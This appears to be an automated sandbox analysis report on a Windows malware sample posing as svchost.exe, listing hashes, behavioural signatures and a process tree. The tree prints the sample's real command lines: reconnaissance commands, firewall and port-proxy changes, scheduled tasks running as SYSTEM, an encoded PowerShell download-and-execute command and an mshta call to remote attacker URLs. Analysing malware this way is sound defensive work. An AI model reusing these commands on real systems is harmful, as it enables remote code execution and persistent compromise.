Overview

Score summary (static analysis and one line per behavioral task, in report order):

Static analysis: score 10
svchost.bin.exe  windows7_x64   score 3
svchost.bin.exe  windows7_x64   score 10
svchost.bin.exe  windows7_x64   score 10
svchost.bin.exe  windows7_x64   score 10
svchost.bin.exe  windows11_x64  score 10
svchost.bin.exe  windows10_x64  score 10
svchost.bin.exe  windows10_x64  score 9
svchost.bin.exe  windows10_x64  score not shown
svchost.bin.exe  windows10_x64  score 10
svchost.bin.exe  windows10_x64  score 10
Analysis (score 10)
- max time kernel: 1826s
- max time network: 1830s
- platform: windows7_x64
- resource: win7-jp
- submitted: 04-09-2021 07:35
Tasks
- Static task static1
- Behavioral task behavioral1: sample svchost.bin.exe, resource win7-jp
- Behavioral task behavioral2: sample svchost.bin.exe, resource win7-fr
- Behavioral task behavioral3: sample svchost.bin.exe, resource win7-en
- Behavioral task behavioral4: sample svchost.bin.exe, resource win7-de
- Behavioral task behavioral5: sample svchost.bin.exe, resource win11
- Behavioral task behavioral6: sample svchost.bin.exe, resource win10-en
- Behavioral task behavioral7: sample svchost.bin.exe, resource win10-jp
- Behavioral task behavioral8: sample svchost.bin.exe, resource win10-fr
- Behavioral task behavioral9: sample svchost.bin.exe, resource win10-en
- Behavioral task behavioral10: sample svchost.bin.exe, resource win10-de
General
- Target: svchost.bin.exe
- Size: 6.6MB
- MD5: 2787bb2d1ab223f8ac2692f3a8fd85fc
- SHA1: dc34ee4e46ddea333cdc90e4aad7589cb8ee1ea0
- SHA256: 952e3e059251cd41e3c67006c5aa4b75fe3e6b0f18d96554b2d60d4ccfb78cb4
- SHA512: d79bd7599ccb09fa72b939a506d04e28cb958e59c3987ab4d375e76337d5b1e33369d59397338aaeaf938c14ec9d93b20501d5224d151631c69c874d0657e9f3
Malware Config
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoC)
  flow    pid   Process
  138979  2856  powershell.EXE
- Modifies Windows Firewall (1 TTP)
- Loads dropped DLL (20 IoCs)
  pid   Process
  1724  svchost.bin.exe  (20 occurrences)
- Drops file in System32 directory (1 IoC)
  description                   ioc                                                                                                                             Process
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.EXE
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  1416  schtasks.exe
  848   schtasks.exe
  1964  schtasks.exe
- Gathers network information (2 TTPs, 3 IoCs)
  Uses commandline utility to view network configuration.
  pid   Process
  1612  ipconfig.exe
  1748  ipconfig.exe
  1132  netstat.exe
- Modifies data under HKEY_USERS (35 IoCs)
  description / ioc / Process (one entry per line):
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"  netsh.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0116c7661a1d701  powershell.EXE
  Set value (int)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"  cmd.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"  netsh.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  WScript.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."  netsh.exe
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft  WScript.exe
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host  WScript.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"  netsh.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  cmd.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"  netsh.exe
  Set value (int)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"  WScript.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"  netsh.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000  netsh.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software  WScript.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"  netsh.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000006096a22960a1d701  WScript.exe
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.EXE
  Set value (int)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"  cmd.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000a0d39d2960a1d701  WScript.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached  WScript.exe
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings  WScript.exe
  Set value (int)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"  WScript.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"  netsh.exe
  Set value (str)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"  netsh.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings  WScript.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WScript.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  1624  powershell.exe  (6 occurrences)
  2856  powershell.EXE
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  description                            pid   Process
  Token: SeIncreaseQuotaPrivilege        608   WMIC.exe  (x2)
  Token: SeSecurityPrivilege             608   WMIC.exe  (x2)
  Token: SeTakeOwnershipPrivilege        608   WMIC.exe  (x2)
  Token: SeLoadDriverPrivilege           608   WMIC.exe  (x2)
  Token: SeSystemProfilePrivilege        608   WMIC.exe  (x2)
  Token: SeSystemtimePrivilege           608   WMIC.exe  (x2)
  Token: SeProfSingleProcessPrivilege    608   WMIC.exe  (x2)
  Token: SeIncBasePriorityPrivilege      608   WMIC.exe  (x2)
  Token: SeCreatePagefilePrivilege       608   WMIC.exe  (x2)
  Token: SeBackupPrivilege               608   WMIC.exe  (x2)
  Token: SeRestorePrivilege              608   WMIC.exe  (x2)
  Token: SeShutdownPrivilege             608   WMIC.exe  (x2)
  Token: SeDebugPrivilege                608   WMIC.exe  (x2)
  Token: SeSystemEnvironmentPrivilege    608   WMIC.exe  (x2)
  Token: SeRemoteShutdownPrivilege       608   WMIC.exe  (x2)
  Token: SeUndockPrivilege               608   WMIC.exe  (x2)
  Token: SeManageVolumePrivilege         608   WMIC.exe  (x2)
  Token: 33                              608   WMIC.exe  (x2)
  Token: 34                              608   WMIC.exe  (x2)
  Token: 35                              608   WMIC.exe  (x2)
  Token: SeDebugPrivilege                1624  powershell.exe
  Token: SeDebugPrivilege                1132  netstat.exe
  Token: SeDebugPrivilege                2856  powershell.EXE
- Suspicious use of WriteProcessMemory (64 IoCs; each entry was recorded 4 times)
  description                        pid   Process          procid_target
  PID 1932 wrote to memory of 1724   1932  svchost.bin.exe  27  (x4)
  PID 1724 wrote to memory of 792    1724  svchost.bin.exe  32  (x4)
  PID 792 wrote to memory of 608     792   cmd.exe          33  (x4)
  PID 1724 wrote to memory of 1032   1724  svchost.bin.exe  35  (x4)
  PID 1032 wrote to memory of 896    1032  cmd.exe          36  (x4)
  PID 896 wrote to memory of 1540    896   net.exe          37  (x4)
  PID 1724 wrote to memory of 1088   1724  svchost.bin.exe  38  (x4)
  PID 1088 wrote to memory of 1488   1088  cmd.exe          39  (x4)
  PID 1488 wrote to memory of 1276   1488  net.exe          40  (x4)
  PID 1724 wrote to memory of 1624   1724  svchost.bin.exe  41  (x4)
  PID 1724 wrote to memory of 1424   1724  svchost.bin.exe  42  (x4)
  PID 1424 wrote to memory of 1612   1424  cmd.exe          43  (x4)
  PID 1724 wrote to memory of 1748   1724  svchost.bin.exe  44  (x4)
  PID 1724 wrote to memory of 1132   1724  svchost.bin.exe  45  (x4)
  PID 2760 wrote to memory of 1696   2760  jcgGYRwv.exe     47  (x4)
  PID 1696 wrote to memory of 1984   1696  cmd.exe          49  (x4)
Processes (tree; indentation shows parent/child relationship)

- C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe (PID 1932)
  command line: "C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe (PID 1724)
    command line: "C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"
    signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 792)
      command line: cmd /c wmic ntdomain get domainname
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 608)
        command line: wmic ntdomain get domainname
        signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\cmd.exe (PID 1032)
      command line: cmd /c net localgroup administrators
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net.exe (PID 896)
        command line: net localgroup administrators
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net1.exe (PID 1540)
          command line: C:\Windows\system32\net1 localgroup administrators
    - C:\Windows\SysWOW64\cmd.exe (PID 1088)
      command line: cmd /c net group "domain admins" /domain
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net.exe (PID 1488)
        command line: net group "domain admins" /domain
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net1.exe (PID 1276)
          command line: C:\Windows\system32\net1 group "domain admins" /domain
    - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 1624)
      command line: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\cmd.exe (PID 1424)
      command line: C:\Windows\system32\cmd.exe /c ipconfig /all
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\ipconfig.exe (PID 1612)
        command line: ipconfig /all
        signatures: Gathers network information
    - C:\Windows\SysWOW64\ipconfig.exe (PID 1748)
      command line: ipconfig /all
      signatures: Gathers network information
    - C:\Windows\SysWOW64\netstat.exe (PID 1132)
      command line: netstat -na
      signatures: Gathers network information; Suspicious use of AdjustPrivilegeToken

- C:\Windows\jcgGYRwv.exe (PID 2760)
  command line: C:\Windows\jcgGYRwv.exe
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 1696)
    command line: cmd /c call "c:\windows\temp\tmp.vbs"
    signatures: Modifies data under HKEY_USERS; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WScript.exe (PID 1984)
      command line: "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
      signatures: Modifies data under HKEY_USERS
      - C:\Windows\SysWOW64\cmd.exe (PID 2356)
        command line: "C:\Windows\System32\cmd.exe" /c echo xbfgK >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\VhgNYK.exe&move /y c:\windows\temp\dig.exe c:\windows\ZovlTo.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VhgNYK /tr "C:\Windows\VhgNYK.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\tdjwjuq" /tr "c:\windows\ZovlTo.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pKJUCCLUP"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\ZovlTo.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\VhgNYK.exe"&schtasks /run /TN escan)
        - C:\Windows\SysWOW64\netsh.exe (PID 2472)
          command line: netsh firewall add portopening tcp 65533 DNSd
          signatures: Modifies data under HKEY_USERS
        - C:\Windows\SysWOW64\netsh.exe (PID 2428)
          command line: netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
          signatures: Modifies data under HKEY_USERS
        - C:\Windows\SysWOW64\schtasks.exe (PID 1964)
          command line: schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
          signatures: Creates scheduled task(s)
        - C:\Windows\SysWOW64\schtasks.exe (PID 1416)
          command line: schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VhgNYK /tr "C:\Windows\VhgNYK.exe" /F
          signatures: Creates scheduled task(s)
        - C:\Windows\SysWOW64\schtasks.exe (PID 848)
          command line: schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\tdjwjuq" /tr "c:\windows\ZovlTo.exe" /F
          signatures: Creates scheduled task(s)

- C:\Windows\FNEhStrW.exe (PID 2468)
  command line: C:\Windows\FNEhStrW.exe

- C:\Windows\system32\taskeng.exe (PID 2712)
  command line: taskeng.exe {A76AC7F8-D501-46F8-B2E1-959EC87B16DB} S-1-5-18:NT AUTHORITY\System:Service:
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2856)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
    signatures: Blocklisted process makes network request; Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken